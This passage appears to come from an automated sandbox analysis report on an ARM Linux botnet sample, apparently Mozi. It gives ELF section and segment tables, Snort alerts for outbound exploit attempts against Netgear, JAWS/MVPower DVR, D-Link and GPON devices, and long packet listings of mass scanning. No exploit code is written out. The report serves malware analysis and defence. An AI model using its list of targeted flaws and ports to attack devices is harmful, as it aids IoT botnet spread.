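| .ARM.exidx | ARM_EXIDX | 0x48580 | 0x40580 | 0x128 | 0x0 | 0x82 | AL | 2 | 0 | 4 |
| .eh_frame | PROGBITS | 0x51000 | 0x41000 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
| .tbss | NOBITS | 0x51004 | 0x41004 | 0x8 | 0x0 | 0x403 | WAT | 0 | 0 | 4 |
| .init_array | INIT_ARRAY | 0x51004 | 0x41004 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
| .fini_array | FINI_ARRAY | 0x51008 | 0x41008 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
| .data.rel.ro | PROGBITS | 0x51010 | 0x41010 | 0x18 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
| .got | PROGBITS | 0x51028 | 0x41028 | 0xb8 | 0x4 | 0x3 | WA | 0 | 0 | 4 |
| .data | PROGBITS | 0x510e0 | 0x410e0 | 0x9ec8 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
| .bss | NOBITS | 0x5afa8 | 0x4afa8 | 0x25b90 | 0x0 | 0x3 | WA | 0 | 0 | 8 |
| .ARM.attributes | ARM_ATTRIBUTES | 0x0 | 0x4afa8 | 0x16 | 0x0 | 0x0 | | 0 | 0 | 1 |
| .shstrtab | STRTAB | 0x0 | 0x4afbe | 0x90 | 0x0 | 0x0 | | 0 | 0 | 1 |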

                                                                                                                  Program Segments

| Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
| EXIDX | 0x40580 | 0x48580 | 0x48580 | 0x128 | 0x128 | 0x4 | R | 0x4 | | .ARM.exidx |
| LOAD | 0x0 | 0x8000 | 0x8000 | 0x406a8 | 0x406a8 | 0x5 | R E | 0x8000 | | .init .text .fini .rodata .ARM.extab .ARM.exidx |
| LOAD | 0x41000 | 0x51000 | 0x51000 | 0x9fa8 | 0x2fb38 | 0x6 | RW | 0x8000 | | .eh_frame .init_array .fini_array .data.rel.ro .got .data .bss |
| TLS | 0x41004 | 0x51004 | 0x51004 | 0x0 | 0x8 | 0x4 | R | 0x4 | | |
| GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0x7 | RWE | 0x4 | | |

                                                                                                                  Network Behavior

                                                                                                                  Snort IDS Alerts

                                                                                                                  02/06/21-11:37:23.765324ICMP485ICMP Destination Unreachable Communication Administratively Prohibited217.7.204.55192.168.2.20
                                                                                                                  02/06/21-11:37:23.057007TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound4031680192.168.2.20156.225.150.183
                                                                                                                  02/06/21-11:37:23.057007TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution4031680192.168.2.20156.225.150.183
                                                                                                                  02/06/21-11:37:23.969428TCP1201ATTACK-RESPONSES 403 Forbidden8040316156.225.150.183192.168.2.20
                                                                                                                  02/06/21-11:37:25.949588ICMP449ICMP Time-To-Live Exceeded in Transit200.130.102.2192.168.2.20
                                                                                                                  02/06/21-11:37:29.760624ICMP485ICMP Destination Unreachable Communication Administratively Prohibited92.45.252.1192.168.2.20
                                                                                                                  02/06/21-11:37:29.880380ICMP449ICMP Time-To-Live Exceeded in Transit59.180.210.210192.168.2.20
                                                                                                                  02/06/21-11:37:30.823169ICMP399ICMP Destination Unreachable Host Unreachable24.124.216.86192.168.2.20
                                                                                                                  02/06/21-11:37:32.144381ICMP449ICMP Time-To-Live Exceeded in Transit152.255.157.71192.168.2.20
                                                                                                                  02/06/21-11:37:32.716325ICMP402ICMP Destination Unreachable Port Unreachable176.20.218.166192.168.2.20
                                                                                                                  02/06/21-11:37:36.986741TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3277680192.168.2.2023.236.242.26
                                                                                                                  02/06/21-11:37:36.986741TCP2025883ET EXPLOIT MVPower DVR Shell UCE3277680192.168.2.2023.236.242.26
                                                                                                                  02/06/21-11:37:38.510012UDP2030919ET TROJAN Mozi Botnet DHT Config Sent1027898759.96.39.49192.168.2.20
                                                                                                                  02/06/21-11:37:39.948030ICMP399ICMP Destination Unreachable Host Unreachable192.168.1.238192.168.2.20
                                                                                                                  02/06/21-11:37:39.948069ICMP399ICMP Destination Unreachable Host Unreachable192.168.1.238192.168.2.20
                                                                                                                  02/06/21-11:37:40.756258ICMP485ICMP Destination Unreachable Communication Administratively Prohibited91.96.55.112192.168.2.20
                                                                                                                  02/06/21-11:37:41.912420ICMP449ICMP Time-To-Live Exceeded in Transit204.225.31.22192.168.2.20
                                                                                                                  02/06/21-11:37:42.948151ICMP399ICMP Destination Unreachable Host Unreachable192.168.1.238192.168.2.20
                                                                                                                  02/06/21-11:37:43.980493ICMP401ICMP Destination Unreachable Network Unreachable193.50.198.5192.168.2.20
                                                                                                                  02/06/21-11:37:44.010181ICMP449ICMP Time-To-Live Exceeded in Transit203.13.23.2192.168.2.20
                                                                                                                  02/06/21-11:37:44.021265TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5445480192.168.2.2023.12.191.118
                                                                                                                  02/06/21-11:37:44.021265TCP2025883ET EXPLOIT MVPower DVR Shell UCE5445480192.168.2.2023.12.191.118
                                                                                                                  02/06/21-11:37:44.289354TCP1200ATTACK-RESPONSES Invalid URL805445423.12.191.118192.168.2.20
                                                                                                                  02/06/21-11:37:45.761796ICMP449ICMP Time-To-Live Exceeded in Transit130.93.107.38192.168.2.20
                                                                                                                  02/06/21-11:37:46.778093ICMP399ICMP Destination Unreachable Host Unreachable207.252.72.17192.168.2.20
                                                                                                                  02/06/21-11:37:46.778139ICMP399ICMP Destination Unreachable Host Unreachable207.252.72.17192.168.2.20
                                                                                                                  02/06/21-11:37:46.816617ICMP399ICMP Destination Unreachable Host Unreachable96.110.161.14192.168.2.20
                                                                                                                  02/06/21-11:37:49.778035ICMP399ICMP Destination Unreachable Host Unreachable207.252.72.17192.168.2.20
                                                                                                                  02/06/21-11:37:50.712635ICMP485ICMP Destination Unreachable Communication Administratively Prohibited80.255.14.222192.168.2.20
                                                                                                                  02/06/21-11:37:50.833848ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited131.100.27.86192.168.2.20
                                                                                                                  02/06/21-11:37:50.842205ICMP449ICMP Time-To-Live Exceeded in Transit137.103.65.26192.168.2.20
                                                                                                                  02/06/21-11:37:51.033629TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound5983280192.168.2.2023.53.160.36
                                                                                                                  02/06/21-11:37:51.033629TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution5983280192.168.2.2023.53.160.36
                                                                                                                  02/06/21-11:37:51.310208TCP1200ATTACK-RESPONSES Invalid URL805983223.53.160.36192.168.2.20
                                                                                                                  02/06/21-11:37:53.300148ICMP399ICMP Destination Unreachable Host Unreachable84.246.147.2192.168.2.20
                                                                                                                  02/06/21-11:37:53.300195ICMP399ICMP Destination Unreachable Host Unreachable84.246.147.2192.168.2.20
                                                                                                                  02/06/21-11:37:53.873838ICMP399ICMP Destination Unreachable Host Unreachable24.30.175.202192.168.2.20
                                                                                                                  02/06/21-11:37:56.350054ICMP399ICMP Destination Unreachable Host Unreachable84.246.147.2192.168.2.20
                                                                                                                  02/06/21-11:37:56.616942ICMP399ICMP Destination Unreachable Host Unreachable154.54.44.198192.168.2.20
                                                                                                                  02/06/21-11:37:57.715239ICMP485ICMP Destination Unreachable Communication Administratively Prohibited77.7.89.221192.168.2.20
                                                                                                                  02/06/21-11:37:57.798034ICMP485ICMP Destination Unreachable Communication Administratively Prohibited149.28.33.22192.168.2.20
                                                                                                                  02/06/21-11:37:58.016734ICMP449ICMP Time-To-Live Exceeded in Transit211.122.27.21192.168.2.20
                                                                                                                  02/06/21-11:38:01.420928ICMP399ICMP Destination Unreachable Host Unreachable154.54.44.198192.168.2.20
                                                                                                                  02/06/21-11:38:02.713757ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                                  02/06/21-11:38:04.710872ICMP485ICMP Destination Unreachable Communication Administratively Prohibited213.222.29.194192.168.2.20
                                                                                                                  02/06/21-11:38:04.717516ICMP485ICMP Destination Unreachable Communication Administratively Prohibited93.221.222.106192.168.2.20
                                                                                                                  02/06/21-11:38:05.743998ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                                  02/06/21-11:38:07.142713ICMP399ICMP Destination Unreachable Host Unreachable37.132.182.1192.168.2.20
                                                                                                                  02/06/21-11:38:10.845917UDP2030919ET TROJAN Mozi Botnet DHT Config Sent630328987116.68.99.187192.168.2.20
                                                                                                                  02/06/21-11:38:11.732172ICMP402ICMP Destination Unreachable Port Unreachable192.109.241.43192.168.2.20
                                                                                                                  02/06/21-11:38:11.782967ICMP399ICMP Destination Unreachable Host Unreachable217.121.74.29192.168.2.20
                                                                                                                  02/06/21-11:38:11.804956ICMP399ICMP Destination Unreachable Host Unreachable91.135.147.130192.168.2.20
                                                                                                                  02/06/21-11:38:12.165410UDP2030919ET TROJAN Mozi Botnet DHT Config Sent331789875.106.1.251192.168.2.20
                                                                                                                  02/06/21-11:38:13.767190ICMP449ICMP Time-To-Live Exceeded in Transit81.31.150.226192.168.2.20
                                                                                                                  02/06/21-11:38:18.714808ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.149.61.90192.168.2.20
                                                                                                                  02/06/21-11:38:18.843715ICMP449ICMP Time-To-Live Exceeded in Transit78.38.241.74192.168.2.20
                                                                                                                  02/06/21-11:38:21.574740ICMP399ICMP Destination Unreachable Host Unreachable103.24.165.198192.168.2.20
                                                                                                                  02/06/21-11:38:21.574816ICMP399ICMP Destination Unreachable Host Unreachable103.24.165.198192.168.2.20
                                                                                                                  02/06/21-11:38:22.828774ICMP485ICMP Destination Unreachable Communication Administratively Prohibited63.148.112.178192.168.2.20
                                                                                                                  02/06/21-11:38:24.778537ICMP399ICMP Destination Unreachable Host Unreachable103.24.165.198192.168.2.20
                                                                                                                  02/06/21-11:38:25.853257ICMP449ICMP Time-To-Live Exceeded in Transit67.142.145.156192.168.2.20
                                                                                                                  02/06/21-11:38:28.774643ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited212.149.148.17192.168.2.20
                                                                                                                  02/06/21-11:38:28.859281ICMP399ICMP Destination Unreachable Host Unreachable192.168.221.30192.168.2.20
                                                                                                                  02/06/21-11:38:28.859548ICMP399ICMP Destination Unreachable Host Unreachable192.168.221.30192.168.2.20
                                                                                                                  02/06/21-11:38:28.846886TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound3974880192.168.2.202.22.143.222
                                                                                                                  02/06/21-11:38:28.846886TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution3974880192.168.2.202.22.143.222
                                                                                                                  02/06/21-11:38:28.901905TCP1200ATTACK-RESPONSES Invalid URL80397482.22.143.222192.168.2.20
                                                                                                                  02/06/21-11:38:30.950724ICMP402ICMP Destination Unreachable Port Unreachable89.64.16.63192.168.2.20
                                                                                                                  02/06/21-11:38:31.859373ICMP399ICMP Destination Unreachable Host Unreachable192.168.221.30192.168.2.20
                                                                                                                  02/06/21-11:38:32.014237ICMP399ICMP Destination Unreachable Host Unreachable216.66.112.1192.168.2.20
                                                                                                                  02/06/21-11:38:32.014303ICMP399ICMP Destination Unreachable Host Unreachable216.66.112.1192.168.2.20
                                                                                                                  02/06/21-11:38:32.765140ICMP449ICMP Time-To-Live Exceeded in Transit185.33.175.11192.168.2.20
                                                                                                                  02/06/21-11:38:32.842708ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited172.241.192.161192.168.2.20
                                                                                                                  02/06/21-11:38:32.964672TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3323680192.168.2.20180.254.107.55
                                                                                                                  02/06/21-11:38:32.964672TCP2025883ET EXPLOIT MVPower DVR Shell UCE3323680192.168.2.20180.254.107.55
                                                                                                                  02/06/21-11:38:36.759669ICMP449ICMP Time-To-Live Exceeded in Transit217.28.252.209192.168.2.20
                                                                                                                  02/06/21-11:38:37.165035ICMP399ICMP Destination Unreachable Host Unreachable192.168.145.206192.168.2.20
                                                                                                                  02/06/21-11:38:37.165077ICMP399ICMP Destination Unreachable Host Unreachable192.168.145.206192.168.2.20
                                                                                                                  02/06/21-11:38:39.957926ICMP449ICMP Time-To-Live Exceeded in Transit191.6.231.6192.168.2.20
                                                                                                                  02/06/21-11:38:40.171213ICMP399ICMP Destination Unreachable Host Unreachable192.168.145.206192.168.2.20
                                                                                                                  02/06/21-11:38:46.822526ICMP399ICMP Destination Unreachable Host Unreachable10.150.7.30192.168.2.20
                                                                                                                  02/06/21-11:38:46.822566ICMP399ICMP Destination Unreachable Host Unreachable10.150.7.30192.168.2.20
                                                                                                                  02/06/21-11:38:49.074319ICMP399ICMP Destination Unreachable Host Unreachable131.221.122.181192.168.2.20
                                                                                                                  02/06/21-11:38:49.074364ICMP399ICMP Destination Unreachable Host Unreachable131.221.122.181192.168.2.20
                                                                                                                  02/06/21-11:38:38.902142TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution5572280192.168.2.2034.66.226.190
                                                                                                                  02/06/21-11:38:49.822413ICMP399ICMP Destination Unreachable Host Unreachable10.150.7.30192.168.2.20
                                                                                                                  02/06/21-11:38:49.967998TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)4943480192.168.2.20104.149.254.177
                                                                                                                  02/06/21-11:38:49.967998TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)4943480192.168.2.20104.149.254.177
                                                                                                                  02/06/21-11:38:50.891179ICMP449ICMP Time-To-Live Exceeded in Transit64.58.5.1192.168.2.20
                                                                                                                  02/06/21-11:38:52.356668ICMP399ICMP Destination Unreachable Host Unreachable131.221.122.181192.168.2.20
                                                                                                                  02/06/21-11:38:52.951424ICMP449ICMP Time-To-Live Exceeded in Transit148.240.205.26192.168.2.20
                                                                                                                  02/06/21-11:38:53.705729ICMP401ICMP Destination Unreachable Network Unreachable80.255.15.98192.168.2.20
                                                                                                                  02/06/21-11:38:54.878962ICMP399ICMP Destination Unreachable Host Unreachable76.167.28.194192.168.2.20
                                                                                                                  02/06/21-11:38:57.745920ICMP485ICMP Destination Unreachable Communication Administratively Prohibited178.27.146.71192.168.2.20
                                                                                                                  02/06/21-11:38:59.016285ICMP399ICMP Destination Unreachable Host Unreachable216.66.112.1192.168.2.20
                                                                                                                  02/06/21-11:39:00.933777TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound5326880192.168.2.20104.103.19.232
                                                                                                                  02/06/21-11:39:00.933777TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution5326880192.168.2.20104.103.19.232
                                                                                                                  02/06/21-11:39:01.090933TCP1200ATTACK-RESPONSES Invalid URL8053268104.103.19.232192.168.2.20
                                                                                                                  02/06/21-11:39:03.893298ICMP399ICMP Destination Unreachable Host Unreachable76.91.242.109192.168.2.20
                                                                                                                  02/06/21-11:39:03.893338ICMP399ICMP Destination Unreachable Host Unreachable76.91.242.109192.168.2.20
                                                                                                                  02/06/21-11:39:06.902409ICMP399ICMP Destination Unreachable Host Unreachable76.91.242.109192.168.2.20
                                                                                                                  02/06/21-11:39:08.252277ICMP449ICMP Time-To-Live Exceeded in Transit152.255.139.166192.168.2.20
                                                                                                                  02/06/21-11:39:08.696783ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.20
                                                                                                                  02/06/21-11:39:10.859295ICMP399ICMP Destination Unreachable Host Unreachable162.39.153.129192.168.2.20
                                                                                                                  02/06/21-11:39:10.859337ICMP399ICMP Destination Unreachable Host Unreachable162.39.153.129192.168.2.20
                                                                                                                  02/06/21-11:39:10.830598TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)4507280192.168.2.2077.238.74.163
                                                                                                                  02/06/21-11:39:10.830598TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)4507280192.168.2.2077.238.74.163
                                                                                                                  02/06/21-11:39:11.007601ICMP399ICMP Destination Unreachable Host Unreachable43.225.35.238192.168.2.20
                                                                                                                  02/06/21-11:39:10.923391TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)3754280192.168.2.20176.119.128.106
                                                                                                                  02/06/21-11:39:10.923391TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)3754280192.168.2.20176.119.128.106
                                                                                                                  02/06/21-11:39:11.997694ICMP399ICMP Destination Unreachable Host Unreachable43.225.35.238192.168.2.20
                                                                                                                  02/06/21-11:39:11.997744ICMP399ICMP Destination Unreachable Host Unreachable43.225.35.238192.168.2.20
                                                                                                                  02/06/21-11:39:12.840609ICMP449ICMP Time-To-Live Exceeded in Transit64.182.214.179192.168.2.20
                                                                                                                  02/06/21-11:39:13.859841ICMP399ICMP Destination Unreachable Host Unreachable162.39.153.129192.168.2.20
                                                                                                                  02/06/21-11:39:13.928651ICMP449ICMP Time-To-Live Exceeded in Transit211.237.128.254192.168.2.20
                                                                                                                  02/06/21-11:39:17.747222ICMP485ICMP Destination Unreachable Communication Administratively Prohibited87.155.20.45192.168.2.20
                                                                                                                  02/06/21-11:39:21.751763ICMP485ICMP Destination Unreachable Communication Administratively Prohibited178.27.214.206192.168.2.20
                                                                                                                  02/06/21-11:39:22.834263ICMP399ICMP Destination Unreachable Host Unreachable85.46.86.42192.168.2.20
                                                                                                                  02/06/21-11:39:22.834309ICMP399ICMP Destination Unreachable Host Unreachable85.46.86.42192.168.2.20
                                                                                                                  02/06/21-11:39:22.834327ICMP399ICMP Destination Unreachable Host Unreachable85.46.86.42192.168.2.20
                                                                                                                  02/06/21-11:39:23.908088ICMP449ICMP Time-To-Live Exceeded in Transit103.4.243.6192.168.2.20
                                                                                                                  02/06/21-11:39:24.734757ICMP399ICMP Destination Unreachable Host Unreachable78.64.7.35192.168.2.20
                                                                                                                  02/06/21-11:39:24.749553ICMP485ICMP Destination Unreachable Communication Administratively Prohibited84.141.215.230192.168.2.20
                                                                                                                  02/06/21-11:39:28.759598ICMP485ICMP Destination Unreachable Communication Administratively Prohibited217.236.144.108192.168.2.20

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                  Feb 6, 2021 11:35:17.038662910 CET475548080192.168.2.20211.98.218.197
                                                                                                                  Feb 6, 2021 11:35:17.038717985 CET5829681192.168.2.20126.165.20.233
                                                                                                                  Feb 6, 2021 11:35:17.038765907 CET486185555192.168.2.204.121.119.146
                                                                                                                  Feb 6, 2021 11:35:17.038870096 CET3341837215192.168.2.207.242.90.54
                                                                                                                  Feb 6, 2021 11:35:17.039277077 CET500767574192.168.2.20203.113.226.208
                                                                                                                  Feb 6, 2021 11:35:17.039278030 CET3401049152192.168.2.20156.188.202.182
                                                                                                                  Feb 6, 2021 11:35:17.039309978 CET332188080192.168.2.2069.219.15.151
                                                                                                                  Feb 6, 2021 11:35:17.039369106 CET422308080192.168.2.2084.49.106.247
                                                                                                                  Feb 6, 2021 11:35:17.039469957 CET5006480192.168.2.20126.111.174.160
                                                                                                                  Feb 6, 2021 11:35:17.039505959 CET4560652869192.168.2.2083.10.2.12
                                                                                                                  Feb 6, 2021 11:35:17.039522886 CET4802281192.168.2.2088.107.197.218
                                                                                                                  Feb 6, 2021 11:35:17.039565086 CET4407452869192.168.2.20137.96.65.50
                                                                                                                  Feb 6, 2021 11:35:17.039619923 CET3725852869192.168.2.2057.57.176.173
                                                                                                                  Feb 6, 2021 11:35:17.039678097 CET5156680192.168.2.2011.51.35.100
                                                                                                                  Feb 6, 2021 11:35:17.039725065 CET4658037215192.168.2.20103.227.10.51
                                                                                                                  Feb 6, 2021 11:35:17.039769888 CET360888080192.168.2.20110.232.182.70
                                                                                                                  Feb 6, 2021 11:35:17.039810896 CET524448080192.168.2.2094.151.112.236
                                                                                                                  Feb 6, 2021 11:35:17.039918900 CET4525880192.168.2.20120.12.34.156
                                                                                                                  Feb 6, 2021 11:35:17.039947033 CET4991280192.168.2.2099.64.63.156
                                                                                                                  Feb 6, 2021 11:35:17.039975882 CET367448080192.168.2.20162.238.7.116
                                                                                                                  Feb 6, 2021 11:35:17.039988995 CET361188443192.168.2.2092.54.230.127
                                                                                                                  Feb 6, 2021 11:35:17.040036917 CET468068443192.168.2.2084.40.114.1
                                                                                                                  Feb 6, 2021 11:35:17.040134907 CET451585555192.168.2.2082.129.200.140
                                                                                                                  Feb 6, 2021 11:35:17.040177107 CET501108080192.168.2.20125.111.112.230
                                                                                                                  Feb 6, 2021 11:35:17.040302992 CET553728080192.168.2.2070.220.45.231
                                                                                                                  Feb 6, 2021 11:35:17.040308952 CET370308080192.168.2.20198.118.3.130
                                                                                                                  Feb 6, 2021 11:35:17.040342093 CET5668681192.168.2.20200.237.209.54
                                                                                                                  Feb 6, 2021 11:35:17.040397882 CET4262880192.168.2.20108.89.104.186
                                                                                                                  Feb 6, 2021 11:35:17.040451050 CET5468649152192.168.2.2081.197.119.173
                                                                                                                  Feb 6, 2021 11:35:17.040501118 CET5212849152192.168.2.20133.239.82.116
                                                                                                                  Feb 6, 2021 11:35:17.040544987 CET3291080192.168.2.20218.241.194.24
                                                                                                                  Feb 6, 2021 11:35:17.040595055 CET591267574192.168.2.2098.157.141.146
                                                                                                                  Feb 6, 2021 11:35:17.040642977 CET5087880192.168.2.2025.69.213.98
                                                                                                                  Feb 6, 2021 11:35:17.040685892 CET5943880192.168.2.207.189.1.96
                                                                                                                  Feb 6, 2021 11:35:17.040731907 CET5879681192.168.2.2057.92.156.14
                                                                                                                  Feb 6, 2021 11:35:17.040781975 CET339308080192.168.2.20113.188.1.54
                                                                                                                  Feb 6, 2021 11:35:17.040908098 CET4936280192.168.2.2054.202.224.33
                                                                                                                  Feb 6, 2021 11:35:17.040954113 CET5899480192.168.2.20183.17.113.109
                                                                                                                  Feb 6, 2021 11:35:17.040992022 CET3277280192.168.2.20183.185.32.137
                                                                                                                  Feb 6, 2021 11:35:17.041034937 CET351448080192.168.2.20181.104.75.138
                                                                                                                  Feb 6, 2021 11:35:17.041095018 CET602848443192.168.2.2047.248.165.151
                                                                                                                  Feb 6, 2021 11:35:17.041143894 CET3907680192.168.2.20120.53.232.220
                                                                                                                  Feb 6, 2021 11:35:17.041197062 CET3613452869192.168.2.2072.90.138.133
                                                                                                                  Feb 6, 2021 11:35:17.041241884 CET4923680192.168.2.20178.149.19.23
                                                                                                                  Feb 6, 2021 11:35:17.041290998 CET5248449152192.168.2.20194.182.145.31
                                                                                                                  Feb 6, 2021 11:35:17.041325092 CET4375081192.168.2.20185.2.174.16
                                                                                                                  Feb 6, 2021 11:35:17.041378021 CET425685555192.168.2.20117.21.241.151
                                                                                                                  Feb 6, 2021 11:35:17.041425943 CET471428080192.168.2.20180.5.162.155
                                                                                                                  Feb 6, 2021 11:35:17.041465044 CET4917280192.168.2.2099.130.128.7
                                                                                                                  Feb 6, 2021 11:35:17.041520119 CET550128080192.168.2.20182.237.85.66
                                                                                                                  Feb 6, 2021 11:35:17.041565895 CET447765555192.168.2.20199.246.152.166
                                                                                                                  Feb 6, 2021 11:35:17.041619062 CET347748080192.168.2.20210.53.199.85
                                                                                                                  Feb 6, 2021 11:35:17.041656971 CET336247574192.168.2.20212.221.62.64
                                                                                                                  Feb 6, 2021 11:35:17.041760921 CET5741080192.168.2.20204.236.203.43
                                                                                                                  Feb 6, 2021 11:35:17.041795015 CET369268080192.168.2.20156.96.88.80
                                                                                                                  Feb 6, 2021 11:35:17.041821003 CET453168080192.168.2.20132.37.211.32
                                                                                                                  Feb 6, 2021 11:35:17.041851044 CET4046649152192.168.2.20175.234.148.74
                                                                                                                  Feb 6, 2021 11:35:17.041894913 CET491525555192.168.2.2014.221.63.65
                                                                                                                  Feb 6, 2021 11:35:17.041937113 CET503548080192.168.2.20174.73.164.213
                                                                                                                  Feb 6, 2021 11:35:17.041981936 CET6002280192.168.2.20106.63.191.143
                                                                                                                  Feb 6, 2021 11:35:17.042031050 CET5041649152192.168.2.2029.23.135.71
                                                                                                                  Feb 6, 2021 11:35:17.042068958 CET345327574192.168.2.2069.233.249.60
                                                                                                                  Feb 6, 2021 11:35:17.042113066 CET463945555192.168.2.20160.55.151.92
                                                                                                                  Feb 6, 2021 11:35:17.042160034 CET3928080192.168.2.2060.3.254.184
                                                                                                                  Feb 6, 2021 11:35:17.042201996 CET442387574192.168.2.2035.21.51.146
                                                                                                                  Feb 6, 2021 11:35:17.042246103 CET594428443192.168.2.2032.147.42.65
                                                                                                                  Feb 6, 2021 11:35:17.042287111 CET436328080192.168.2.2033.2.251.75
                                                                                                                  Feb 6, 2021 11:35:17.042329073 CET546145555192.168.2.20183.218.103.29
                                                                                                                  Feb 6, 2021 11:35:17.042375088 CET394105555192.168.2.205.75.227.209
                                                                                                                  Feb 6, 2021 11:35:17.042428970 CET382945555192.168.2.20199.215.82.120
                                                                                                                  Feb 6, 2021 11:35:17.042474031 CET5033649152192.168.2.2017.36.10.53
                                                                                                                  Feb 6, 2021 11:35:17.042532921 CET6059449152192.168.2.20134.182.231.67
                                                                                                                  Feb 6, 2021 11:35:17.042579889 CET4220837215192.168.2.20122.136.129.218
                                                                                                                  Feb 6, 2021 11:35:17.042623043 CET3641852869192.168.2.20120.248.5.159
                                                                                                                  Feb 6, 2021 11:35:17.042670012 CET6058480192.168.2.2044.16.97.47
                                                                                                                  Feb 6, 2021 11:35:17.042706013 CET5100637215192.168.2.2059.147.111.47
                                                                                                                  Feb 6, 2021 11:35:17.042753935 CET606168080192.168.2.20164.16.139.252
                                                                                                                  Feb 6, 2021 11:35:17.042794943 CET3483281192.168.2.20161.198.22.163
                                                                                                                  Feb 6, 2021 11:35:17.042845964 CET3898237215192.168.2.2087.221.52.97

                                                                                                                  UDP Packets

                                                                                                                  Feb 6, 2021 11:35:41.434936047 CET898750321192.168.2.20203.106.190.38
                                                                                                                  Feb 6, 2021 11:35:41.568839073 CET132238987202.164.139.202192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:41.570244074 CET898725671192.168.2.20117.194.151.7
                                                                                                                  Feb 6, 2021 11:35:41.670140982 CET503218987203.106.190.38192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:41.671653032 CET89876881192.168.2.2079.105.123.122
                                                                                                                  Feb 6, 2021 11:35:41.872895002 CET6881898779.105.123.122192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:41.874423981 CET89872404192.168.2.20101.109.246.8
                                                                                                                  Feb 6, 2021 11:35:41.881405115 CET898751413192.168.2.20176.63.119.43
                                                                                                                  Feb 6, 2021 11:35:41.891469955 CET256718987117.194.151.7192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:41.892848015 CET898742083192.168.2.20101.108.128.65
                                                                                                                  Feb 6, 2021 11:35:41.953963995 CET514138987176.63.119.43192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:41.954504967 CET898751413192.168.2.2078.42.182.237
                                                                                                                  Feb 6, 2021 11:35:42.007810116 CET51413898778.42.182.237192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:42.008341074 CET898765056192.168.2.20217.155.20.167
                                                                                                                  Feb 6, 2021 11:35:42.070517063 CET650568987217.155.20.167192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:42.071079969 CET898761463192.168.2.2072.252.107.217
                                                                                                                  Feb 6, 2021 11:35:42.123478889 CET420838987101.108.128.65192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:42.124073982 CET898712098192.168.2.20134.35.90.126
                                                                                                                  Feb 6, 2021 11:35:42.289239883 CET61463898772.252.107.217192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:42.289999008 CET89878547192.168.2.20130.239.18.159
                                                                                                                  Feb 6, 2021 11:35:42.361150980 CET85478987130.239.18.159192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:42.362580061 CET898727693192.168.2.20109.252.25.27
                                                                                                                  Feb 6, 2021 11:35:42.784684896 CET120988987134.35.90.126192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:42.785300016 CET898730080192.168.2.20116.68.99.134
                                                                                                                  Feb 6, 2021 11:35:42.786780119 CET120988987134.35.90.126192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:42.787307024 CET89873883192.168.2.20178.72.68.55
                                                                                                                  Feb 6, 2021 11:35:42.895538092 CET38838987178.72.68.55192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:42.896039009 CET898741096192.168.2.20202.164.138.117
                                                                                                                  Feb 6, 2021 11:35:42.977632046 CET300808987116.68.99.134192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:42.978226900 CET898723618192.168.2.20121.144.185.39
                                                                                                                  Feb 6, 2021 11:35:43.091905117 CET410968987202.164.138.117192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:43.092395067 CET898753015192.168.2.20116.68.97.80
                                                                                                                  Feb 6, 2021 11:35:43.259783030 CET236188987121.144.185.39192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:43.260425091 CET898716616192.168.2.20117.194.164.205
                                                                                                                  Feb 6, 2021 11:35:43.278172970 CET530158987116.68.97.80192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:43.278698921 CET89878081192.168.2.20130.61.89.230
                                                                                                                  Feb 6, 2021 11:35:43.503052950 CET89878744192.168.2.20130.239.18.159
                                                                                                                  Feb 6, 2021 11:35:43.572724104 CET87448987130.239.18.159192.168.2.20
                                                                                                                  Feb 6, 2021 11:35:43.574078083 CET898761133192.168.2.2080.101.30.62
